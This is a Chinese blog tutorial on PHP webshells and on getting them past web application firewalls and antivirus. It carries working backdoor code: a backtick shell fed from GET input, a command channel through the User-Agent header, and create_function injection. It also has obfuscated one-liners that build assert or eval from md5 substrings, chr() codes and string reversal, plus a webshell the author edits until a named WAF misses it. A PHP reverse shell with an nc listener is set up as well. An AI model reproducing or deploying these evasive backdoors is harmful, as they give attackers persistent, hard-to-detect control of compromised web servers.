php webshell原理,php webshell分析和绕过waf原理解析
本文讲述的是php
webshell分析和绕过waf的原理解析,旨在服务社会,供安全研究人员学习使用,请勿用于其他非法用途,违者后果自负。WebShell是攻击者使用的恶意脚本,它的用途主要是在攻击后的Web应用程序上建立持久性的后门。webshell本身不能攻击或者利用远程漏洞,所以说它总是攻击的第二阶段,这个阶段我们经常称为post-exploitation。(PS:Post Exploitation是国外渗透测试标准里面的一个阶段)
WebShell常用函数
现在的Web应用程序基本上是采用PHP开发的,所以本篇文章也主要介绍的是php环境下的WebShell。WebShell无非就是使用PHP内置的函数来执行命令,以下就是用于在php中执行shell命令的一些最常用的函数。
system()
system()函数接收命令作为参数,并输出结果。
以下示例演示了运行dir命令,显示执行php文件目录的目录列表:
?1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121system('dir');
?>
-->
驱动器 C 中的卷没有标签。 卷的序列号是 7C53-7529 C:phpstudyWWW 的目录 2016-12-02 15:39
. 2016-12-02 15:39
.. 2016-12-02 15:38 56 hello.php 2016-12-02 15:38 29 system.php 2016-12-02 15:39
test 2 个文件 85 字节 3 个目录 871,600,128 可用字节
exec()
exec()函数接收一个命令作为参数,当不输出结果,如果指定第二个可选参数,则结果将作为数组返回。否则,如果回显,将只显示结果的最后一行。
exec('dir')
?>
-->
我们可以使用echo来输出exec()函数的结果。可以发现只有结果的最后一行。
echo exec('dir');
?>
-->
3 个目录 871,538,688 可用字节
如果指定第二个参数,则在数组中返回结果。
echo exec('dir',$array);
print_r($array);
?>
-->
3 个目录 871,538,688 可用字节Array ( [0] => 驱动器 C 中的卷没有标签。 [1] => 卷的序列号是 7C53-7529 [2] => [3] => C:phpstudyWWW 的目录 [4] => [5] => 2016-12-02 15:52
. [6] => 2016-12-02 15:52
.. [7] => 2016-12-02 16:15 53 exec.php [8] => 2016-12-02 15:38 56 hello.php [9] => 2016-12-02 15:46 25 system.php [10] => 2016-12-02 15:39
test [11] => 3 个文件 134 字节 [12] => 3 个目录 871,538,688 可用字节 )
shell_exec()
shell_exec()函数类似于exec()函数,但不同的是,它会将整个结果作为字符串输出。
echo shell_exec('dir');
?>
-->
驱动器 C 中的卷没有标签。 卷的序列号是 7C53-7529 C:phpstudyWWW 的目录 2016-12-02 16:26
. 2016-12-02 16:26
.. 2016-12-02 16:15 53 exec.php 2016-12-02 15:38 56 hello.php 2016-12-02 16:27 34 shellexec.php 2016-12-02 15:46 25 system.php 2016-12-02 15:39
test 4 个文件 168 字节 3 个目录 871,460,864 可用字节
passthru()
passthru()函数执行命令并返回输出。
passthru('dir');
?>
-->
驱动器 C 中的卷没有标签。 卷的序列号是 7C53-7529 C:phpstudyWWW 的目录 2016-12-02 16:35
. 2016-12-02 16:35
.. 2016-12-02 16:15 53 exec.php 2016-12-02 15:38 56 hello.php 2016-12-02 16:35 27 passthru.php 2016-12-02 16:27 34 shellexec.php 2016-12-02 15:46 25 system.php 2016-12-02 15:39
test 5 个文件 195 字节 3 个目录 871,456,768 可用字节
proc_open()
proc_open()函数执行一个命令,并且打开用来输入/输出的文件指针。
这个函数可能很难理解,简单的来说,通过使用proc_open()函数,我们可以创建一个进程用于我们的脚本和我们想要运行程序之间的通信。详见PHP文档:
http://php.net/manual/zh/function.proc-open.php
preg_replace()与/e修饰符
preg_replace()函数可以执行正则表达式的搜索和替换
如果使用/e修饰符,意味着使用eval执行替换,这样我们就可以传递一个要由eval()函数执行的代码
preg_replace('/.*/e', 'system("net user");', '');
?>
-->
的用户帐户 ------------------------------------------------------------------------------- Administrator ASPNET Guest HelpAssistant SUPPORT_388945a0 命令运行完毕,但发生一个或多个错误。
反引号
肯定很多人没有注意到这点吧,php将反引号的内容作为shell命令执行。
$string=`$_GET[id]`;
echo "
$string";
?>
结果:
某WAF也没扫描到:
隐藏WebShell-免杀之路
利用HTTP请求头
在php中,我们可以很容易获取到HTTP请求头里面的某些特殊字符串头,比如User-Agent。同样的原理,我也可以利用这个来传入需要执行的命令。
'HTTP_USER_AGENT'])?>
通过User-Agent传入命令执行:
某waf也是扫描到,当然除了User-Agent,我们还有Accept-Language等特殊字符串头,这里就不做演示了,主要的还是方法。
混淆技术
上面的方法虽然过了waf,但是我们人工一看就知道有问题,所以我们还需要一些混淆技术来隐藏webshell。首先我们来认识一下几个常用功能。
eval() :把字符串作为PHP代码执行
assert() :判断一个表达式是否成立,直接传入字符串会当做 PHP 代码来执行
base64() :使用base64对数据进行编码
gzdeflate() :对数据进行Deflate压缩,gzinflate()解压缩
str_rot13() :对字符串执行 ROT13 转换
回调函数
这种办法国内我是看了phithon的介绍,不过这里我肯定要介绍是最新能绕waf的函数。
create_function()
$args = "hui";
$code = "a;}$_POST['bar'];/*";
echo create_function('$args',$code);
?>
这样构造可以把前面的函数体闭合,再把后面的注释掉,这样就相当于执行了。
eval($_POST[bar])
使用system函数执行net user命令:
反弹shell
这里给大家介绍一个php反弹shell的脚本。
下载地址:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
使用方法:
第一步,填写需要反弹到的IP地址和端口以及需要执行的shell命令。
$ip = '127.0.0.1'; // IP地址
$port = 1234; // 端口
$shell = 'net user'; //需要执行的命令
然后我使用nc监听端口1234:
nc -v -n -l -p 1234
访问php文件后,查看nc监听结果,发现命令成功执行,结果反弹。
waf没有扫描到。
那些年强悍的WebShell分析
在Github上有个项目收集了很多的WebShell,这里我们拿出几个我认为比较强悍的webshell分析一下。
项目地址:https://github.com/tennc/webshell
利用404页面隐藏PHP木马
webshell/php/404.php
这里主要的代码如下:
eval(gzinflate(base64_decode($code)));
木马代码被编码压缩在$code变量中,验证密码是否正确,正确就解压执行,这里密码经过了三次md5加密。
过某waf的webshell
webshell/php/bypass-safedog-2016-08-29.php
$a=md5('a').'
';
$poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114).chr(116);
$poc($_GET['a']);
?>
利用a的md5值取出了a和e,配合chr函数,构造出assert。
利用演示:
zone_hackbar.php
webshell/php/zone_hackbar.php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];
if(isset($s22)){eval($s21($s22));}
?>
这个webshell也是通过隐藏关键字,$s21就是base64解密函数,$s22就是接收POST数据。不过某waf对eval可是很敏感的,直接报警。
不要紧,我们修改一下就可以了,用assert,不需要base64加密了。
$sF="PCT4BA6ODSE_";
$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];
if(isset($s22)){assert($s22);}
?>
这次就没有扫描到了,看看使用有没有错。
过各大杀软的pHp一句话
?1
2
3
4
5
6
7
8
9
10
11webshell/php/过各大杀软的pHp一句话.php
$_uU=chr(99).chr(104).chr(114);
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);
$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);
$_=$_fF("",$_cC);@$_();
?>
看起来没什么,其实就是先构造了chr这个字符串,然后利用chr函数分别构造了eval($_POST[1]);和create_function。
最后就是执行:
create_function("",eval($_POST[1]););
不过现在某waf对chr可是很敏感滴。立马被拦截了。
最新过某waf一句话
这个是我在互联网上看见的,其实和回调函数差不多,拿来分析一下吧。
?1
2
3
4
5
6
7
8
9
10
11
12
13
14
15error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function yuag_array($b,$c){
$b=strrev($b);
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['yuag']);
?>
先是构造了一个函数yuag_array,然后传入了两个参数,经过反转和替换字符串构造出assert。
这样最后执行的就是:
array_map(assert,array($_POST['yuag']));
这里就不再做详细介绍了。
php webshell原理,php webshell分析和绕过waf原理解析相关推荐
- mysql数据库视图原理_详细分析mysql视图的原理及使用方法
前言: 在MySQL中,视图可能是我们最常用的数据库对象之一了.那么你知道视图和表的区别吗?你知道创建及使用视图要注意哪些点吗?可能很多人对视图只是一知半解,想详细了解视图的同学看过来哟,本篇文章会详 ...
- Lucene 原理与代码分析完整版
原文地址为: Lucene 原理与代码分析完整版 Lucene 原理与代码分析系列文章已经基本告一段落,可能问题篇还会有新的更新. 完整版pdf可由以下链接下载. Lucene 原理与代码分析完整版 ...
- (18)【WAF绕过】WAF部署、绕过分析和原理、注入绕过WAF方法
目录 一.WAF部署: 1.1.阿里云盾 1.2.安全狗: 1.3.宝塔面板: 下载地址: 桌面应用端 web网页端 二.WAF绕过 2.1.原理: 2.2.介绍: 2.3.WAF分为非嵌入型WAF和 ...
- 常见网络攻击类型的原理和危害性分析以及对应的解决措施
1.Webshell攻击 威胁级别:高 原理:Webshell攻击就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常 ...
- WAF原理及绕过(成功绕过某狗)
绕过截图 测试网站sqli-labs/Less-11,hackbar被拦截,burp成功绕过报错 原理解析 参考链接: https://blog.csdn.net/qq_36119192/articl ...
- php负载均衡原理_Java开发大型互联网架构深入负载均衡原理之方案分析
引言 负载均衡 建立在现有网络结构之上,它提供了一种廉价有效透明的方法扩展网络设备和服务器的带宽.增加吞吐量.加强网络数据处理能力.提高网络的灵活性和可用性. 负载均衡,英文名称为Load Balan ...
- java.lang.ThreadLocal实现原理和源码分析
java.lang.ThreadLocal实现原理和源码分析 1.ThreadLocal的原理:为每一个线程维护变量的副本.某个线程修改的只是自己的副本. 2.ThreadLocal是如何做到把变量变 ...
- php函数的实现原理及性能分析
2019独角兽企业重金招聘Python工程师标准>>> 前言 在任何语言中,函数都是最基本的技术单元之一.对于php的函数,它具有哪些特点?函数调用是怎么实现?php函数的性能如何, ...
- python装饰器原理-Python装饰器原理与用法分析
这篇文章主要介绍了Python装饰器原理与用法,结合实例形式分析了Python装饰器的概念.原理.使用方法及相关操作注意事项,需要的朋友可以参考下 本文实例讲述了Python装饰器原理与用法.分享给大 ...
最新文章
- python计算文件md5值_用python 正确计算大文件md5 值
- 1.1 基本图像导入、处理和导出
- 高性能、高并发、高扩展性和可读性的网络服务器架构:StateThreads
- HTML跳转为啥会404,为什么网页会出现404 not found?
- c#基础知识总结学习
- dw连接mysql数据库原理_Dreamweaver数据库路径是什么
- 怎么学习前端开发?求推荐学习路线?
- atheros蓝牙设备驱动 小米_双十一值得买的蓝牙耳机,真无线蓝牙耳机音质排行榜...
- C++子类和父类,引用类和被引用类之间的顺序关系
- 我过去1个月的上课总结
- 论文笔记:Connectionist Temporal Classification: Labelling Unsegmented Sequence
- 586A 586B线序
- 如何把妹子拍得更好看?
- Deepin 与 Win10 双系统 Deepin无法启动且没有引导项问题
- 6-3 读文章(*)
- HDOJ-1060-Leftmost Digit(求n^n的最高位)
- 2022-忙碌的一年
- S32K144调试记录(一)
- Ubuntu下硬件信息的查看方式
- 软件测试基础知识bbst,海盗派测试分析MFQPPDCS海盗派.PDF